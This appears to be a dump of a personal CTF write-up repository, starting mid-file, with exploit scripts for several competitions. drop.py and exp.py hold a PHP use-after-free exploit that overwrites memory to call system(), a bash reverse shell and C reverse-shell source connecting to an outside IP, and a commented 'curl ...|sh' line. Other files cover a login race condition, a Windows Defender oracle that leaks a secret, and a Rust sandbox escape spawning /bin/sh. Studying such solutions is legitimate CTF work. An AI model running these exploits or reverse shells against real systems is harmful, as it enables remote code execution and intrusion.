38 | Accept-Encoding: gzip, deflate, br 39 | Accept-Language: 
ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 40 | 41 | username={username}'''.replace('\n', '\r\n').format(session=session, username=data['username'], length=len('username=')+len(data['username']))) 42 | 43 | 44 | def go2(): 45 | global session, r2, data 46 | import requests 47 | 48 | cookies = { 49 | 'session': session, 50 | } 51 | 52 | headers = { 53 | 'Connection': 'keep-alive', 54 | 'Cache-Control': 'max-age=0', 55 | 'Origin': 'http://triggered.pwni.ng:52856', 56 | 'Upgrade-Insecure-Requests': '1', 57 | 'Content-Type': 'application/x-www-form-urlencoded', 58 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36', 59 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 60 | 'Referer': 'http://triggered.pwni.ng:52856/login', 61 | 'Accept-Encoding': 'gzip, deflate', 62 | 'Accept-Language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7', 63 | } 64 | 65 | data = { 66 | 'username': 'admin' 67 | } 68 | 69 | time.sleep(0.3) 70 | response = requests.post('http://triggered.pwni.ng:52856/login', headers=headers, cookies=cookies, data=data) 71 | print 'admin-response', response.content, response.history 72 | print '-----------------' 73 | 74 | 75 | go1() 76 | r1.interactive() 77 | 78 | 79 | import requests 80 | 81 | cookies = { 82 | 'session': session, 83 | } 84 | 85 | headers = { 86 | 'Connection': 'keep-alive', 87 | 'Cache-Control': 'max-age=0', 88 | 'Origin': 'http://triggered.pwni.ng:52856', 89 | 'Upgrade-Insecure-Requests': '1', 90 | 'Content-Type': 'application/x-www-form-urlencoded', 91 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36', 92 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 93 | 'Referer': 
'http://triggered.pwni.ng:52856/login/password', 94 | 'Accept-Encoding': 'gzip, deflate', 95 | 'Accept-Language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7', 96 | } 97 | 98 | data = { 99 | 'password': data['password'] 100 | } 101 | 102 | thread.start_new_thread(go2, ()) 103 | response = requests.post('http://triggered.pwni.ng:52856/login/password', headers=headers, cookies=cookies, data=data) 104 | 105 | print response.history 106 | print response.content 107 | 108 | # thread.start_new_thread(go3, ()) 109 | 110 | # r2.interactive() 111 | -------------------------------------------------------------------------------- /2019/realworld/mop/drop.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | from pwn import * 3 | 4 | url = 'http://localhost:7989'; 5 | url = 'http://52.53.55.151:11514/'; 6 | 7 | payload_leak = ''' 8 | file_put_contents("/tmp/junobb.c", $_POST['code']); 9 | file_put_contents("/tmp/junox", $_POST['data']); 10 | 11 | chmod("/tmp/junox", 0777); 12 | // echo file_get_contents("/tmp/junox"); 13 | 14 | echo file_get_contents("/tmp/juno1234"); 15 | 16 | '''; 17 | 18 | yes = '''#!/bin/sh 19 | gcc -o /tmp/junobb /tmp/junobb.c 20 | ls -al /etc/passwd > /tmp/juno1234 21 | 22 | which gcc >> /tmp/juno1234 23 | ls -al /tmp/junobb >> /tmp/juno1234 24 | 25 | echo "1234" | /tmp/junobb >> /tmp/juno1234 26 | /bin/bash -i >& /dev/tcp/13.209.57.159/80 0>&1 27 | 28 | 29 | sleep 1; 30 | ''' 31 | 32 | yes2 = '''#include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | 45 | #define REMOTE_ADDR "13.209.57.159" 46 | #define REMOTE_PORT 80 47 | 48 | int main() 49 | { 50 | sigignore(SIGALRM); 51 | struct sockaddr_in sa; 52 | int s; 53 | 54 | sa.sin_family = AF_INET; 55 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 56 | sa.sin_port = htons(REMOTE_PORT); 57 | 58 | s = socket(AF_INET, SOCK_STREAM, 0); 59 | 
connect(s, (struct sockaddr *)&sa, sizeof(sa)); 60 | 61 | dup2(s, 0); 62 | dup2(s, 1); 63 | dup2(s, 2); 64 | execve("/readflag", 0, 0); 65 | // system("/readflag"); 66 | } 67 | ''' 68 | 69 | c = post(url, data={'rce': payload_leak, 'data': yes, 'code': yes2}, headers={'Content-Type': 'application/x-www-form-urlencoded'}); 70 | print c.text 71 | -------------------------------------------------------------------------------- /2019/realworld/mop/exp.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | from pwn import * 3 | 4 | url = 'http://localhost:7989'; 5 | url = 'http://52.53.55.151:11514/'; 6 | 7 | payload_leak = ''' 8 | $spec = "P2Y4DT6H8M"; 9 | $dllist = new SplDoublyLinkedList(); 10 | $dllist->push(new DateInterval($spec)); 11 | 12 | var_dump($dllist); 13 | var_dump($s = serialize($dllist)); 14 | 15 | var_dump($dllist->top()); 16 | $leak = $dllist->top()->y; 17 | 18 | printf("leak 0x%x\n", $leak); 19 | 20 | '''; 21 | 22 | 23 | c = post(url, data={'rce': payload_leak}, headers={'Content-Type': 'application/x-www-form-urlencoded'}, stream=True); 24 | heap_addr = int(c.text.split('leak ')[1].split('\n')[0], 16) 25 | print hex(heap_addr) 26 | 27 | payload_libc = ''' 28 | error_reporting(E_ALL); 29 | ini_set('display_errors', 1); 30 | function hex_dump($data, $newline="\n") 31 | { 32 | static $from = ''; 33 | static $to = ''; 34 | static $width = 16; # number of bytes per line 35 | static $pad = '.'; # padding for non-visible characters 36 | if ($from==='') 37 | { 38 | for ($i=0; $i<=0xFF; $i++) 39 | { 40 | $from .= chr($i); 41 | $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; 42 | } 43 | } 44 | $hex = str_split(bin2hex($data), $width*2); 45 | $chars = str_split(strtr($data, $from, $to), $width); 46 | $offset = 0; 47 | foreach ($hex as $i => $line) 48 | { 49 | echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . 
$newline; 50 | $offset += $width; 51 | } 52 | } 53 | // zval_ptr_dtor - use leak.php 54 | 55 | // 0x7ff31dc641c0 56 | $code_leak = 0x7FF327863FE0; 57 | 58 | // reserve valid heap chunks 59 | $arr = []; 60 | $arr[] = str_repeat("1", 23); 61 | $arr[] = str_repeat("2", 23); 62 | $arr[] = str_repeat("3", 23); 63 | $arr[] = str_repeat("4", 23); 64 | $arr[] = str_repeat("5", 23); 65 | $spec = "P2Y4DT6H8M"; 66 | $dllist = new SplDoublyLinkedList(); 67 | $dllist->push(new DateInterval($spec)); 68 | var_dump($dllist); 69 | var_dump($s = serialize($dllist)); 70 | var_dump($dllist->top()); 71 | $leak = $dllist->top()->y; 72 | var_dump("bp"); 73 | $dllist->top()->y -= 0x88; 74 | var_dump("bp"); 75 | $x = str_repeat("A", 23); 76 | var_dump($x); 77 | $y = str_repeat("B", 23); 78 | var_dump($y); 79 | // overwrite size of $x 80 | 81 | $z = pack("QQQ", 0x0000000600000002, 0, 0x100000000000); 82 | // now we have an overlap chunk - release valid chunks to prevent corrupted allocation 83 | unset($arr); 84 | 85 | $x_buf_addr = $leak-0x58; 86 | 87 | // hex_dump(substr($x, $code_leak - $x_buf_addr, 0x300)); 88 | hex_dump(substr($x, 0, 0x180)); 89 | 90 | ''' 91 | 92 | payload_libc = '''error_reporting(E_ALL); 93 | ini_set('display_errors', 1); 94 | function hex_dump($data, $newline="\\n") 95 | { 96 | static $from = ''; 97 | static $to = ''; 98 | static $width = 16; # number of bytes per line 99 | static $pad = '.'; # padding for non-visible characters 100 | if ($from==='') 101 | { 102 | for ($i=0; $i<=0xFF; $i++) 103 | { 104 | $from .= chr($i); 105 | $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; 106 | } 107 | } 108 | $hex = str_split(bin2hex($data), $width*2); 109 | $chars = str_split(strtr($data, $from, $to), $width); 110 | $offset = 0; 111 | foreach ($hex as $i => $line) 112 | { 113 | echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . 
$newline; 114 | $offset += $width; 115 | } 116 | } 117 | // reserve valid heap chunks 118 | $arr = []; 119 | $arr[] = str_repeat("1", 23); 120 | $arr[] = str_repeat("2", 23); 121 | $arr[] = str_repeat("3", 23); 122 | $arr[] = str_repeat("4", 23); 123 | $arr[] = str_repeat("5", 23); 124 | $spec = "P2Y4DT6H8M"; 125 | $dllist = new SplDoublyLinkedList(); 126 | $dllist->push(new DateInterval($spec)); 127 | var_dump($dllist); 128 | var_dump($s = serialize($dllist)); 129 | var_dump($dllist->top()); 130 | $leak = $dllist->top()->y; 131 | var_dump("bp"); 132 | $dllist->top()->y -= 0x88; 133 | var_dump("bp"); 134 | $x = str_repeat("A", 23); 135 | var_dump($x); 136 | $y = str_repeat("B", 23); 137 | var_dump($y); 138 | // overwrite size of $x 139 | $z = pack("QQQ", 0x0000000600000002, 0, 0x100000000000); 140 | // now we have an overlap chunk - release valid chunks to prevent corrupted allocation 141 | unset($arr); 142 | $x_buf_addr = $leak-0x58; 143 | // step 1 144 | // zval_ptr_dtor = 0x7FF327863FE0 145 | $leak_target = $x_buf_addr; 146 | $leak_size = 0x100; 147 | // step 2 148 | $code_leak = 0x7FF327863FE0; 149 | $leak_target = $code_leak + 0xa2caf0; 150 | $leak_size = 16; 151 | hex_dump(substr($x, $leak_target - $x_buf_addr, $leak_size));''' 152 | 153 | with post(url, data={'rce': payload_libc}, headers={'Content-Type': 'application/x-www-form-urlencoded'}) as c: 154 | print c.text 155 | 156 | 157 | target = heap_addr + 0xf8 - 0x20 158 | 159 | print 'target', hex(target) 160 | 161 | # system = heap_addr + 0xd000280 + (i << 12) 162 | 163 | system = 0x7ff32adea440 # remote 164 | system = 0x7ff32adea440 165 | # system = 0x7f6780467440 # local 166 | 167 | print hex(system) 168 | 169 | # 0x2a3d50 170 | 171 | # 0x7f6d23dae440 172 | payload_rce = ''' 173 | $spec = "P2Y4DT6H8M"; 174 | $dllist = new SplDoublyLinkedList(); 175 | $dllist->push(new DateInterval($spec)); 176 | 177 | var_dump($dllist); 178 | var_dump($s = serialize($dllist)); 179 | 180 | var_dump($dllist->top()); 181 | 
$leak = $dllist->top()->y; 182 | printf("leak: 0x%x\n", $leak); 183 | var_dump("bp"); 184 | 185 | // $dllist->top()->y -= 0x88; 186 | $dllist->top()->y -= (0x40 + 0x10 + 0x30 - 8); 187 | var_dump("bp"); 188 | 189 | // $x = str_repeat("A", 23); 190 | // 191 | 192 | $z = pack("QQQ", 0x41424344, 0x41424345, {}); 193 | 194 | // $y = str_repeat("B", 23); 195 | // $y= pack("QQQ", 0x61626364, 0x61626364, 0x61626364); 196 | $y = str_repeat("{}BBBBBBBBBBBBBBB", 1); 197 | var_dump($y); 198 | 199 | // $z = pack("QQQ", leak + 0x30, 0, 0x17); 200 | // $z = pack("QQQ", 0x41424344, 0x41424344, 0x41424344); 201 | // $z = str_repeat("\x1fcurl app.imjuno.com|sh", 1); 202 | $z = str_repeat("\x1f/tmp/junox;sleep 0 ", 1); 203 | var_dump($z); 204 | 205 | // var_dump($dllist); 206 | 207 | echo "trigger!!!\\n"; 208 | 209 | var_dump($dllist->top()->y); // trigger 210 | var_dump("bp"); 211 | 212 | 213 | '''.format(hex(target), repr(p64(system)).replace("'", '')) 214 | 215 | print payload_rce 216 | 217 | 218 | c = post(url, data={'rce': payload_rce}, headers={'Content-Type': 'application/x-www-form-urlencoded'}); 219 | print c.text 220 | -------------------------------------------------------------------------------- /2019/realworld/mop/readme.md: -------------------------------------------------------------------------------- 1 | # MoP 2 | 3 | - https://github.com/php/php-src/commit/9483c507725637a45704d5983f3eaf7ca37875c9 4 | - Simple UAF 5 | -------------------------------------------------------------------------------- /2020/confidence-pre/angry-defender.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | > The flag is everywhere. You just need to catch it. 4 | > 5 | > Hint: Javascript doesn't make Defender angry enough. 
6 | 7 | # Analysis 8 | 9 | ```python 10 | SECRET = os.environ["FLAG"].encode("ascii") 11 | MAX_DATA_SIZE = 1024 * 1024 12 | CACHE_FOLDER = "c:\\storage" 13 | CACHE_SIZE = 256 14 | ``` 15 | 16 | - The constants tell us this application runs on Windows, because the cache path starts with a drive letter (`C:`). 17 | 18 | ```python 19 | @app.route("/cache", methods=["PUT"]) 20 | def put() -> str: 21 | data = request.data 22 | if MAX_DATA_SIZE < len(data): 23 | abort(403) 24 | id = uuid.uuid4() 25 | lru.write(id.hex, data + SECRET) 26 | return str(id) 27 | ``` 28 | 29 | - The `cache` handler appends the flag after our input and just returns the key of the LRU cache entry. 30 | 31 | 32 | ```python 33 | @app.route("/cache/<key>", methods=["GET"]) 34 | def get(key: str) -> bytes: 35 | id = uuid.UUID(key) 36 | try: 37 | blob = lru.read(id.hex) 38 | except KeyError: 39 | abort(404) 40 | data = blob[: -len(SECRET)] 41 | if data + SECRET != blob: 42 | abort(500) 43 | return data 44 | ``` 45 | 46 | - Then we can compare the HTTP status code to see whether someone (ok, Windows Defender) changed or deleted our input (= the cached file). 47 | - It's another version of icchy's [slide](https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle). 48 | - Unfortunately, we cannot add trailing bytes after the flag, which means we cannot make a valid string token. 49 | 50 | # Exploitation 51 | 52 | **Windows Defender's Emulator is AWESOME** 53 | 54 | - According to Alexi's [slide](https://i.blackhat.com/us-18/Thu-August-9/us-18-Bulazel-Windows-Offender-Reverse-Engineering-Windows-Defenders-Antivirus-Emulator.pdf), Windows Defender also emulates PE-format executables. 55 | - `MAX_DATA_SIZE` is < 1MB, so we had to make a tiny PE file that would let the flag be recognized as code (or attached to memory). 56 | - The first try is [http://www.phreedom.org/research/tinype/](http://www.phreedom.org/research/tinype/). 
57 | 58 | ![./images/1.png](./images/1.png) 59 | 60 | - good, 61 | - we searched a lot on google but we could not find any way to an emulator to detect as virus. 62 | - soon, I remember that rpisec is doing an malware traning course [https://github.com/RPISEC/Malware](https://github.com/RPISEC/Malware). their hacking skills are nice (as far as i know), so they have a tiny pe with malware sample? (I know that this was not a logical thinking. Yes I was lucky XD) 63 | - after downloading a lecture 4, windows defender detected it as a malware. and then I added a '\xcc' (int 0x3) to the first code offset (0x200), surprisingly windows defender did not detect as a malware. 64 | 65 | ```python 66 | #!/usr/bin/env python2 67 | # flag: p4{c4n_y0u_pr1n7_73n5h4-h0_w17h0u7_b07h_h4nd5?} 68 | import requests 69 | import time 70 | import string 71 | 72 | # 31 C0 83 F8 01 EB 01 90 90 CC CC 73 | a = open('juno.exe', 'rb').read() # is inside a same directory. 74 | 75 | b = a[:512] 76 | c = a[512:] 77 | 78 | from pwn import * 79 | 80 | import string 81 | 82 | def gogo(index, t): 83 | payload = asm((''' 84 | call a 85 | a: 86 | pop ebx 87 | add ebx, %d 88 | xor eax, eax 89 | mov al, byte ptr [ebx] 90 | cmp al, {what} 91 | jz b 92 | int 0x3 93 | b: 94 | ''' % (len(c) + 0x10 + index)).format(what=ord(t))) 95 | 96 | a = b + payload + c 97 | 98 | tmpkey = requests.put('http://angry-defender.zajebistyc.tf/cache', data=a).text 99 | res = requests.get('http://angry-defender.zajebistyc.tf/cache/{tmpkey}'.format(tmpkey=tmpkey)) 100 | if res.status_code == 500: 101 | print 'wtf[%d]="%s"' % (index, t) 102 | 103 | 104 | index = 0 105 | 106 | import sys 107 | 108 | 109 | # for i in xrange(36, 40): 110 | for t in string.printable: 111 | t = threading.Thread(target=gogo, args=(int(sys.argv[1]), t)) 112 | # t = threading.Thread(target=gogo, args=(i, t)) 113 | t.start() 114 | 115 | a = raw_input() 116 | ``` 117 | -------------------------------------------------------------------------------- 
/2020/confidence-pre/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2020/confidence-pre/images/1.png -------------------------------------------------------------------------------- /2020/confidence-pre/juno.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2020/confidence-pre/juno.exe -------------------------------------------------------------------------------- /2020/confidence-pre/two-sandbox-challs.md: -------------------------------------------------------------------------------- 1 | - one line writeup: I do not understand why we can override `unsafe_code` option, from forbid to allow. 2 | 3 | ```rust 4 | #![allow(unsafe_code)] 5 | pub fn main() { 6 | let x = "/bin/sh\x00"; 7 | let buf = x.as_bytes(); 8 | let ret: isize; 9 | unsafe { 10 | asm!("syscall" 11 | : "={rax}"(ret) 12 | : "{rax}"(59), "{rsi}"(0), "{rdi}"(buf.as_ptr()), "{rdx}"(0) 13 | : "rcx","r11","memory" 14 | : "volatile"); 15 | } 16 | 17 | } 18 | ``` 19 | -------------------------------------------------------------------------------- /2021/defcon/readme.md: -------------------------------------------------------------------------------- 1 | # defcon 29 2 | 3 | - [coooinbase](./coooinbase) 4 | - [coooinbase-kernel](./coooinbase-kernel) 5 | - [exploit-for-dummies](./exploit-for-dummies) 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hello, I'm Juno! 
2 | 3 | 4 | -------------------------------------------------------------------------------- /WhiteHat Grand Prix 06 - KingTigerPrawn - Write Up.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/WhiteHat Grand Prix 06 - KingTigerPrawn - Write Up.pdf --------------------------------------------------------------------------------